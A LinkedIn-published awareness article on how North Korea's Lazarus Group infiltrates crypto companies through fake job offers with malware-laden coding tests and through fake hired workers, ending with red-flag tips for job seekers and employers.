North Korea’s Techniques for Infiltrating Crypto Companies
February was been a headline grabbing month for the state sponsored hacker group, the Lazarus Group, after their $1.4bn heist of Bybit exchange. This surpasses the estimated $1.1bn they pilfered in 2024 and brings their total to around $6billion which is expected to have been spent bolstering their nuclear program.
The state sponsored hacking group use increasingly sophisticated methods to steal funds and have hit a number of crypto projects over the last few years:
- Ronin Bridge 2022 $600m
- Horizon Bridge 2022 $100m
- Atomic Wallet $100m 2023
- Stake.com $41m 2023
- WazirX exchange $235m
A notable component of their success is through their ability to deeply embed themselves into the projects, often weeks and months before the heist takes place. They gain this access through social engineering methods and increasingly by exploiting recruiting pipelines.
So how are they doing this?
Fake Job Offers
A Bitdefender Labs employee came across one of their tactics first hand after a “recruiter” from a DEX got in touch with them over LinkedIn with an enticing job offer. The recruiter asked them for their CV and github — a standard part of the hiring process for software engineers, and then arranged a technical interview where the applicant could show their coding skills, before a final CEO and compensation conversation.
Nothing out of the ordinary.
However the CV and Github provided by the applicants would have been harvested for useful data that North Korea could use to better shape their recruitment tactics or for their own engineers CVs (which I’ll talk about in just a moment), and then second technical coding stage is where their malicious intent really came to fruition. Ahead of the session the candidate was sent a repo which included an MVP of the project and a google form for the user to follow to execute the code during the interview. However the files contained malicious code that scanned the candidate’s device for cryptocurrency wallets and sensitive private key, credential and personal information that could be harvested. What’s more, there were packages for cryptomining on the user’s device and key logging to snatch all inputted information on the device. So anyone who had reached round 2 of the hiring process would have their device blown wide open to have all their sensitive information, data and cryptoassets stolen!
Whilst the Bitdefender Labs dev saw the risk early on and didn’t download the malware, an engineer at Estonia exchange CoinsPaid sadly fell foul to a very similar technique and in July 2023 after they had downloaded a file for the technical part of the hiring process on their work laptop, saw $37m drained from the company accounts.
https://www.insurancejournal.com/news/international/2023/08/10/734763.htm
This campaign is thought to have been running since 2023 with freelance software engineers particularly at risk of being targeted, and whilst LinkedIn is certainly a venue of choice this activity has been seen on Upwork, Freelancer.com , We Work Remotely, Moonlight, and Crypto Jobs List.
There have also been version where the user is directed to install a video conferencing app which is laced with malware — either bespoke apps or versions of well known apps like Zoom and Meet.
Red Flags and How to Protect Yourself — Job Hunting
🚩Whilst LinkedIn is a great tool for job hunting always be caution with cold approaches, especially from recruiters who provide limited information about the role or company.
🚩Avoid downloading documents, opening files and running any provided code — this is a gateway for hackers to access your device and information!
Hackers for Hire
If you have been hiring engineers for a blockchain firm in the last few years the chances are that you’ve had an encounter that raised your eyebrows and made you feel a bit uncertain about exactly who you were talking to. I’ve had my fair share.
Candidates who refused to turn on their video, or who’s video didn’t seem to exactly match up to their audio, or who’s responses seemed straight out of a ChatGPT chatlog.
Not all of these would have been North Korean hackers, but there’s a potential that some were as numerous crypto firms have reported interviewing candidates that raised a flag for being North Korea linked, and there is now a growing list of companies that have hired North Korea attackers (unknowingly!).
This is a method which the state sponsored hacking group is using to both embed their criminals within the organisations they intend to hack, as well as a method of pulling a salary that can build up the war chest of the nation.
It’s estimated that North Korea earns over $600m per year from embedding their hackers within crypto (and non-crypto) companies and they use a raft of fake IDs and personas to pass recruitment screening processes.
In one case, North Korea hackers infiltrated a Solana trading bot company and 3 months later stole $1.4m of tokens, in another with an unnamed firm the hacker downloaded sensitive company information after they were onboarded and held the company to ransom, in Sept 2021 the token launching platform MISO had $3 million stolen after two freelance developers redirected funds to a wallet they controlled. However, in a particularly worrying case, Truflation, hired not one North Korean hacker but after an intense coordinated campaign against them, had 1/3rd of their company as embedded North Korean actors! But it’s not just smaller projects with potentially more limited hiring checks, big named projects in the space have inadvertently hired North Korea workers: Cosmos Hub, Injective, ZeroLend, Fantom, Sushi and Yearn Finance.
https://www.coindesk.com/tech/2024/10/02/how-north-korea-infiltrated-the-crypto-industry
And many projects only find out they had a North Korean worker at their company after an email or call from law enforcement, where they have traced some crypto payroll transactions to a Lazarus Group linked wallet.
However, one tried and tested method to detect potential North korean bad actors from within the hiring process is to show them a picture of Kim Jong Un and ask them to insult or deface him. There have been many cases shared on LinkedIn and Twitter where the candidates either disconnect or hurl insults to the recruiter after this surprise round. So it seems to do the trick!
Red Flags and How to Protect Yourself — Hiring
(Each of the below could have perfectly legitimate reasons so it’s important to assess these in the round and alongside other aspects!)
🚩Whilst the crypto world had many projects and founders who wish to remain pseudonymous, if a new employee refuses to put their camera on
🚩Employees who change their payroll address frequently and request payment in crypto only
🚩Employees who change their telegram handle frequently and other social media/networking profiles
🚩Employees who seem to completely forget information or need rebriefing could be a flag that you’re not talking to the same person each time.
Stay safe out there and watch out for who you hire!
Originally published at https://www.linkedin.com.
